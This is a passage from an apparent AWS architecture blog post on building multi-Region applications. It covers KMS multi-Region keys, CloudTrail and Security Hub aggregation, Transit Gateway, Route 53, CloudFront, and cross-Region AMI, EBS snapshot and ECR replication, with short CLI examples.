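      --secret-id prod/app/db-password \
      --add-replica-regions Region=us-west-2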

Encrypt everything all the time

AWS KMS can be used to encrypt data at rest, and is used extensively for encryption across AWS services. By default, keys are confined to a single Region. AWS KMS multi-Region keys can be created to replicate keys to a second Region, which eliminates the need to decrypt and re-encrypt data with a different key in each Region.
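
As a sketch, creating a multi-Region primary key and replicating it looks like the following. Note that replicate-key must be called in the primary key's Region, and the replica Region is a placeholder.

    # Create a multi-Region primary key, then replicate it to a second Region.
    KEY_ID=$(aws kms create-key --multi-region --query 'KeyMetadata.KeyId' --output text)
    aws kms replicate-key --key-id "$KEY_ID" --replica-region us-west-2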

AWS CloudTrail logs user activity and API usage. Logs are created in each Region, but they can be centralized from multiple Regions and multiple accounts into a single Amazon Simple Storage Service (Amazon S3) bucket. As a best practice, these logs should be aggregated to an account that is only accessible to required security personnel to prevent misuse.

As your application expands to new Regions, AWS Security Hub can aggregate and link findings to a single Region to create a centralized view across accounts and Regions. These findings are continuously synced between Regions to keep you updated on global findings.

We put these features together in Figure 1.

Figure 1. Multi-Region security, identity, and compliance services

Building a global network

For resources launched into virtual networks in different Regions, Amazon Virtual Private Cloud (Amazon VPC) allows private routing between Regions and accounts with VPC peering. These resources can communicate using private IP addresses and do not require an internet gateway, VPN, or separate network appliances. This works well for smaller networks that only require a few peering connections. However, as the number of peered connections increases, the mesh of peered connections can become difficult to manage and troubleshoot.

AWS Transit Gateway can help reduce these difficulties by creating a central transitive hub to act as a cloud router. A Transit Gateway’s routing capabilities can expand to additional Regions with Transit Gateway inter-Region peering to create a globally distributed private network.

Building a reliable, cost-effective way to route users to distributed Internet applications requires highly available and scalable Domain Name System (DNS) records. Amazon Route 53 does exactly that.

Route 53 routing policies can route traffic to a record with the lowest latency, or automatically fail over a record. If a larger failure occurs, the Route 53 Application Recovery Controller can simplify the monitoring and failover process for application failures across Regions, AZs, and on-premises.

Amazon CloudFront’s content delivery network is truly global, built across 300+ points of presence (PoP) spread throughout the world. Applications that have multiple possible origins, such as across Regions, can use CloudFront origin failover to automatically fail over the origin. CloudFront’s capabilities expand beyond serving content, with the ability to run compute at the edge. CloudFront functions make it easy to run lightweight JavaScript functions, and AWS Lambda@Edge makes it easy to run Node.js and Python functions across these 300+ PoPs.

AWS Global Accelerator uses the AWS global network infrastructure to provide two static anycast IPs for your application. It automatically routes traffic to the closest Region deployment, and if a failure is detected it will automatically redirect traffic to a healthy endpoint within seconds.

Figure 2 brings these features together to create a global network across two Regions.

Figure 2. AWS VPC connectivity and content delivery

Building the compute layer

An Amazon Elastic Compute Cloud (Amazon EC2) instance is based on an Amazon Machine Image (AMI). An AMI specifies instance configurations such as the instance’s storage, launch permissions, and device mappings. When a new standard image needs to be created, EC2 Image Builder can be used to streamline copying AMIs to selected Regions.

Although EC2 instances and their associated Amazon Elastic Block Store (Amazon EBS) volumes live in a single AZ, Amazon Data Lifecycle Manager can automate the process of taking and copying EBS snapshots across Regions. This can enhance DR strategies by providing a relatively easy cold backup-and-restore option for EBS volumes.
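
An individual snapshot copy can also be performed ad hoc from the CLI. In this sketch, the snapshot ID and Regions are placeholders, and the command runs against the destination Region.

    # Copy a snapshot from us-east-1 into us-west-2.
    aws ec2 copy-snapshot \
      --region us-west-2 \
      --source-region us-east-1 \
      --source-snapshot-id snap-0123456789abcdef0 \
      --description "Cross-Region DR copy"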

As an architecture expands into multiple Regions, it can become difficult to track where instances are provisioned. Amazon EC2 Global View helps solve this by providing a centralized dashboard to see Amazon EC2 resources such as instances, VPCs, subnets, security groups, and volumes in all active Regions.

Microservice-based applications that use containers benefit from quicker start-up times. Amazon Elastic Container Registry (Amazon ECR) can help ensure this happens consistently across Regions with private image replication at the registry level. An ECR private registry can be configured for either cross-Region or cross-account replication to ensure your images are ready in secondary Regions when needed.
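
Registry-level replication can be configured with a single call. In this sketch, the destination Region and account ID are placeholders, and the rule replicates every repository in the registry.

    # Replicate all repositories in this registry to us-west-2 in the same account.
    aws ecr put-replication-configuration \
      --replication-configuration '{"rules":[{"destinations":[{"region":"us-west-2","registryId":"111122223333"}]}]}'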

We bring these compute layer features together in Figure 3.

Figure 3. AMI and EBS snapshot copy across Regions

Summary

It’s important to create a solid foundation when architecting a multi-Region application. These foundations pave the way for you to move fast in a secure, reliable, and elastic way as you build out your application. In this post, we covered options across AWS security, networking, and compute services that have built-in functionality to take away some of the undifferentiated heavy lifting. We’ll cover data, application, and management services in future posts.

Ready to get started? We’ve chosen some AWS Solutions and AWS Blogs to help you!

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!